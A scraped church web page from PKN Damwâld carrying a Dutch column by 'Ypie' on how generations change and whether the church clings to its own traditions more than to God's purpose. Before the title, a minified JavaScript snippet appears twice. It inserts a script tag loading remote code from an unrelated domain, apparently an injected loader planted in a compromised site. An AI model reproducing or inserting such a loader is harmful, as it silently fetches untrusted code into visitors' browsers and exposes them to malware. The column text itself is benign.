;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Generaties gaan en generaties komen ... - PKN Damwâld

Generaties gaan en generaties komen …

Gepubliceerd op: maandag 1 januari 2018

Waar denkt u aan bij deze titel? Waarschijnlijk aan overlijden en geboorte. Uiteraard is niet ieder dag gegeven dat weet ik, maar in deze column wil ik daar even van uitgaan. Gemiddeld genomen worden mannen ca. 79 en vrouwen ca. 83 jaar. Generaties gaan en generaties komen. Echter wat gebeurd er in de tussentijd? Ook dan komen en gaan generaties. Om de 15 jaar wisselt een generatie. Zij die in die 15 jaar geboren zijn maken samen politieke en economische gebeurtenissen mee. Hebben te maken met dezelfde invloeden van het sociale systeem waarin ze opgroeien en dat zorgt samen er voor dat een generatie veranderd. Wees eerlijk, doet u nog de dingen die uw ouders deden? Wanneer u ouder bent en u kijkt naar kinderen en jongeren. Tja, dat is weer een andere tijd. Alleen de techniek al. Maar ook de individualisering, mede tot stand gekomen door het onderwijs met competentiegericht onderwijs, de werkgevers met hun persoonlijke ontwikkelingsplannen. U als oudere was gericht op mogelijk alleen de kerk daar vond alles plaats. Vrienden zaten bij u in de kerk. U bezocht eigenlijk alleen kerkelijke activiteiten. Wanneer u wat wilde weten vroeg u de dominee of ouderling en met de antwoorden stelde u zich tevreden. Tja… dat is tegenwoordig toch echt anders. Men duikt eerst op internet. Heeft overal vrienden en DE waarheid… das lastig omdat er zoveel informatie is en… zo kan ik wel even doorgaan. U begrijpt het al.. ja als we zo naar generaties kijken… dan komen en gaan generaties zeker sneller en wisselender dan bij de momenten van overlijden en geboorte. Leuk zult u denken maar wat moeten wij als kerk daarmee? Ik denk alles. Jongere generaties zitten dus anders in elkaar dan oudere generaties. Daar kunnen ze niets aan doen. Hun tijd was anders, hun ouders waren weer anders dan hun grootouders. De opvoedingsstijl van hun ouders was ouders en die van hun grootouders .. kortom… ze zijn anders, handelen anders en denken anders. En wat dan met God? Die blijft steeds dezelfde!!! De vraag is hoe kijkt God naar die veranderende generaties? Dan kijk ik graag naar Jezus. Hij ging naast de mensen zitten, startte bij hun leven, hun levensverhaal en legde daar Het verhaal van God naast. Jezus deed het in Zijn tijd anders dan de farizeeën en wetsgeleerden. Jezus hield net als hun vast aan wat God voor de mensen wilde doen. Maar vulde dat op een andere wijze in zoals bedoeld was door Zijn Vader. Hij keek naar wat God voor de mensen in hun leven mocht betekenen. Maar deed dat vanuit de mens naast zich. Wat wij er mee kunnen? Als kerk en als kerkmens mogen we ons daar op bezinnen. Zitten wij aan gewoontes en tradities vanuit ‘onze’ generaties vast, meer dan aan wat God voor en met ons mensen wil?

Columnist:Ypie

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns